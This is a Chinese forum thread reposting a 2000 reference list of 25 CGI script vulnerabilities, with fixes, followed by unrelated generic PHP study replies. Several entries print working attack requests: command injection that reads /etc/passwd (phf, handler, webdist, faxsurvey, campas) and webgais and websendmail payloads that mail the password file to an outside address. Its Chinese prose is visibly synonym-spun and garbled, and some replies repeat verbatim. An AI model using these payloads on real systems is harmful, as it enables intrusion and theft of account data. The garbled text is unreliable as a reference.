因胸联盟 发表于 2015-2-4 00:24:12

PHP教程之CGI平安破绽材料速查 v1.0(转一)

会有很多高手的鼓励,新手的支持,慢慢你劲头就十足,有更多的信心和兴趣去学。cgi|平安|平安破绽   ◆ CGI平安破绽材料速查 v1.0

日期:2000-8-15

    #############################################################################
本文取自一名伴侣.这原本不算是甚么名贵的器材,假如你平常注重搜集的话,信任良多人城市
有比这份更周全、更好的材料.但因为某些缘由.这些材料一向都不愿被公然.但我是一个崇尚完
全自在、完整开放、完整同享的little guys.所以我把这份材料公然了.但愿那位伴侣不要见怪 :) 
# 若有任何平安组织或团体情愿无尝对此文停止临时的、不中断地保护、更新或更改. 请自行
随意,不用与我参议.但请求是功效必需完整地向internet公然. 任何行动的私藏都是不受欢
迎的.
# 本文接待转摘.但请坚持这些声明。
# 若有任何成绩或建议,请mailto: iwillsurewin@163.net
# iwillsurewin 2000.7.28
############################################################################

         
1
类型: 进击型
名字: phf
风险品级: 中
描写: 在NCSA 或 Apache (1.1.1版本之内)非贸易版本的Web Server中有一段法式util.c,答应黑客以root身份履行任何一个指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建议: 
处理办法: 把Apache web server晋级到1.1.1以上,或将NCSA web server晋级到最新版本

_________________________________________________________________

2
类型: 进击型
名字: wguset.exe
风险品级: 中
描写: 假如您利用NT做为您的WebServer的操作体系,并且wguest.exe存在于您的Web可履行目次中的话,入侵者将能使用它浏览到您的硬盘上一切USR_<hostname>用户能浏览的文件
建议: 将wguset.exe从你的Web目次移走或删除
处理办法: 将wguset.exe从你的Web目次移走或删除

___________________________________________________________________


3
类型: 进击型
名字: rguset.exe
风险品级: 中
描写: 假如您利用NT做为您的WebServer的操作体系,并且rguest.exe存在于您的Web可履行目次中的话,入侵者将能使用它浏览到您的硬盘上一切USR_<hostname>用户能浏览的文件
建议: 将rguset.exe从你的Web目次移走或删除
处理办法: 将rguset.exe从你的Web目次移走或删除


_______________________________________________________________________

4
类型: 进击型
名字: perl.exe
风险品级: 低
描写: 在cgi-bin履行目次下存在perl.exe,这属于严重的设置装备摆设毛病。黑客可以在perl.exe前面加一串指令,使用阅读器在server上履行任何剧本法式
建议: perl.exe是放在任何带履行权限的web目次下都是不平安的
处理办法: 在web目次下移除perl.exe这个法式.


____________________________________________________________________


5
类型: 进击型
名字: shtml.exe
风险品级: 低
描写: 假如您利用Front Page作为您的WebServer,那末入侵者可以使用IUSR_<lt;hostname>用户和shtml.exe入侵您的机械,做您不但愿的事
建议: 将shtml.exe从你的Web目次移走或删除
处理办法: 将shtml.exe从你的Web目次移走或删除


___________________________________________________________________


6
类型: 进击型
名字: wwwboard.pl
风险品级: 低
描写: wwwboard.pl法式轻易引发进击者对办事器停止D.O.S进击
建议: 如无需要可以删除该文件
处理办法: 对get_variables的子法式中的上面这段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
交换为:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}

相干毗连: http://hgfr

_________________________________________________________________________

7
类型: 进击型
名字: uploader.exe
风险品级: 中
描写: 假如您利用NT作为您的WebServer的操作体系,入侵者可以使用uploader.exe上传任何文件
建议: 将uploader.exe从你的Web目次移走或删除
处理办法: 将uploader.exe从你的Web目次移走或删除

________________________________________________________________

8
类型: 进击型
名字: bdir.htr
风险品级: 高
描写: 假如您利用NT做为您的WebServer的操作体系,并且bdir.htr存在于您的Web可履行目次中的话,入侵者将能使用它在您的办事器上无尽头的创立ODBC数据库,并生成一些可履行的文件。
建议: 将bdir.htr从你的Web目次移走或删除
处理办法: 将bdir.htr从你的Web目次移走或删除

__________________________________________________________________

9
类型: 进击型
名字: Count.cgi
风险品级: 高
描写: 在/cgi-bin目次下的Count.cgi法式(wwwcount2.3版本)有一个溢失足误,答应入侵者不必登录而近程履行任何指令.
建议: 如无需要可以删除该文件
处理办法: 将wwwcount晋级到2.4或以上

_________________________________________________________________

10
类型: 进击型
名字: test-cgi
风险品级: 高
描写: test-cgi这个文件可以被入侵者用来阅读办事器上的主要信息

建议: 建议审核cgi-bin目次下的履行法式,严厉掌握会见权限
处理办法: 删除test-cgi文件

__________________________________________________________________

11
类型: 进击型
名字: nph-test-cgi
风险品级: 高
描写: nph-test-cgi这个文件可以被入侵者用来阅读办事器上的主要信息

建议: 建议审核cgi-bin目次下的履行法式,严厉掌握会见权限
处理办法: 删除nph-test-cgi文件

__________________________________________________________________

12
类型: 进击型
名字: php.cgi
风险品级: 低
描写: php.cgi法式有较多的破绽,包含缓存溢露马脚,还有招致任何体系文件可以被入侵者读取的破绽
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除php.cgi法式是最好的举措

_________________________________________________________________

13
类型: 进击型
名字: handler
风险品级: 低
描写: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler法式存在缓存溢失足误,答应入侵者在server上近程履行一段法式:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除handler文件

________________________________________________________________


14
类型: 进击型
名字: webgais
风险品级: 高
描写: /cgi-bin,目次下的webgais是GAIS搜刮东西的一个接口,它有一个偏差使入侵者可以绕进程序的平安机制,履行体系号令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80

query=';mail+you\@your.host</etc/passwd;echo'&output=subject&domain=paragraph
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除webgais文件

________________________________________________________________

15
类型: 进击型
名字: websendmail
风险品级: 高
描写: /cgin-bin目次下的websendmail法式答应入侵者履行一个体系指令:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 初级用户:编纂websendmail剧本,过滤特别字符
普通用户:删除websendmail文件

____________________________________________________________________

16
类型: 进击型
名字: webdist.cgi
风险品级: 高
描写: 关于Irix6.2和6.3平台,/cgi-bin目次下的webdist.cgi有一个弱点答应入侵者不必登录而在体系上履行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/var/www/cgi-bin/webdist.cgi目次下的webdist.cgi

__________________________________________________________________

17
类型: 进击型
名字: faxsurvey
风险品级: 高
描写: 在Linux S.u.S.E上/cgi-bin目次下的faxsurvey法式答应入侵者不必登录就可以在办事器履行指令:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin/faxsurvey文件


_______________________________________________________________________


18
类型: 进击型
名字: htmlscript
风险品级: 中
描写: 装置了htmlscript2.99x或更早版本的办事器,存在一个偏差使入侵者可以检查办事器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin/htmlscript剧本文件,或将htmlscript晋级到3。0以上


__________________________________________________________________________

19
类型: 进击型
名字: pfdisplay
风险品级: 中
描写: 在Irix6.4或更早版本的web办事器上,/cgi-bin/pfdisplay法式答应入侵者不法检查办事器上的文件
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin/pfdisplay文件,或打补钉
补钉可以去sgigate.sgi.com (204.94.209.1) 或ftp.sgi.com下载:
Filename: README.patch.3018
Algorithm #1 (sum -r): 37955 11 README.patch.3018
Algorithm #2 (sum): 15455 11 README.patch.3018
MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69

Filename: patchSG0003018
Algorithm #1 (sum -r): 01679 2 patchSG0003018
Algorithm #2 (sum): 12876 2 patchSG0003018
MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8

Filename: patchSG0003018.idb
Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
Algorithm #2 (sum): 251 2 patchSG0003018.idb
MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename: patchSG0003018.performer_tools_man
Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29

Filename: patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F
相干毗连: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
类型: 进击型
名字: www-sql
风险品级: 中
描写: www-sql存在于/cgi-bin/目次下,这将招致入侵可以越权会见被回护的文件
建议: 最好删除www-sql文件
处理办法: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
相干毗连:

_________________________________________________________________________________


21
类型: 进击型
名字: view-source
风险品级: 高
描写: 在cgi-bin目次下的view-source法式没有对输出停止平安反省,使入侵者可以检查办事器上的任何文件
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin目次下的viewsource法式
相干毗连: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

______________________________________________________________________

22
类型: 进击型
名字: campas
风险品级: 高
描写: 在cgi-bin目次下的campas法式有一个偏差可使入侵者随便检查server上的主要文件:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin目次下的campas法式
相干毗连: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


___________________________________________________________________________


23
类型: 进击型
名字: aglimpse
风险品级: 高
描写: 在cgi-bin目次下的aglimpse法式有一个偏差可使入侵者不必登录而随便履行任何指令 
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin目次下的aglimpse法式
相干毗连: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


______________________________________________________________________________

24
类型: 进击型
名字: AT-admin.cgi
风险品级: 中
描写: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi法式,答应通俗用户完整掌握全部体系
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin目次下的AT-admin.cgi法式
相干毗连: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________

25
类型: 进击型
名字: finger
风险品级: 中
描写: 这个位于/cgi-bin下的finger法式,可以检查其它办事器的信息,然而假如将参数改本钱机,本机上的帐号信息将原形毕露:
/cgi-bin/finger?@localhost
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 删除/cgi-bin目次下的finger法式
相干毗连:


________________________________________________________________________
看到好的帖子最好up一下,以使得更多的人得到分享。

小妖女 发表于 2015-2-4 12:56:16

环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候,我强烈建议多读php手册。

愤怒的大鸟 发表于 2015-2-9 22:44:59

兴趣是最好的老师,百度是最好的词典。

若相依 发表于 2015-2-28 03:20:12

遇到出错的时候,我经常把错误信息直接复制到 google的搜索栏,一般情况都是能搜到结果的,不过有时候会搜出来一大片英文的出来,这时候就得过滤一下,吧中文的弄出来,挨着式方法。

山那边是海 发表于 2015-3-6 03:34:24

首先我是坚决反对新手上来就用框架的,因为对底层的东西一点都不了解,造成知识上的真空,会对以后的发展不利。我的观点上手了解下框架就好,代码还是手写。当然啦如果是位别的编程语言的高手的话,这个就另当别论啦。

爱飞 发表于 2015-3-12 19:27:59

装在C盘下面可以利用windows的ghost功能可以还原回来(顺便当做是重转啦),当然啦我的编译目录要放在别的盘下,不然自己的劳动成果就悲剧啦。

只想知道 发表于 2015-3-17 00:07:15

为了以后维护的方便最好是代码上都加上注释,“予人方便,自己方便”。此外开发文档什么的最好都弄齐全。我觉得这是程序员必备的素质。虽然会消耗点很多的时间。但是确实是非常有必要的。

飘灵儿 发表于 2015-3-20 10:13:05

使用zendstdio 写代码的的时候,把tab 的缩进设置成4个空格是很有必要的

活着的死人 发表于 2015-3-24 21:37:53

最后祝愿,php会给你带来快乐的同时 你也会给他带来快乐。

简单生活 发表于 2015-4-12 22:37:45

你很难利用原理去编写自己的代码。对于php来说,系统的学习我认为还是很重要的,当你有一定理解后,你可你针对某种效果研究,我想那时你不会只是复制代码的水平了。

兰色精灵 发表于 2015-5-1 17:09:34

写的比较杂,因为我也是个新手,不当至于大家多多指正。

不帅 发表于 2015-7-6 00:25:48

爱上php,他也会爱上你。

金色的骷髅 发表于 2015-7-10 06:23:04

学习php的目的往往是为了开发动态网站,phper就业的要求也涵盖了很多。我大致总结为:精通php和mysql

莫相离 发表于 2015-7-10 12:51:25

其实没啥难的,多练习,练习写程序,真正的实践比看100遍都有用。不过要熟悉引擎

老尸 发表于 2015-7-12 21:20:57

对于懒惰的朋友,我推荐php的集成环境xampp或者是wamp。这两个软件安装方便,使用简单。但是我还是强烈建议自己动手搭建开发环境。

admin 发表于 2015-7-14 19:41:21

如果你可以写完像留言板这样的程序,那么你可以去一些别人的代码了,

再现理想 发表于 2015-10-15 20:14:58

环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候,我强烈建议多读php手册。

分手快乐 发表于 2015-10-31 05:03:50

基础有没有对学习php没有太大区别,关键是兴趣。

乐观 发表于 2015-11-14 17:57:05

写js我最烦的就是 ie 和 firefox下同样的代码 结果显示的结果千差万别,还是就是最好不要用遨游去调试,因为有时候遨游是禁用js的,有可能代码是争取结果被遨游折腾的认为是代码写错。

灵魂腐蚀 发表于 2015-11-14 18:14:23

使用zendstdio 写代码的的时候,把tab 的缩进设置成4个空格是很有必要的
页: [1]
查看完整版本: PHP教程之CGI平安破绽材料速查 v1.0(转一)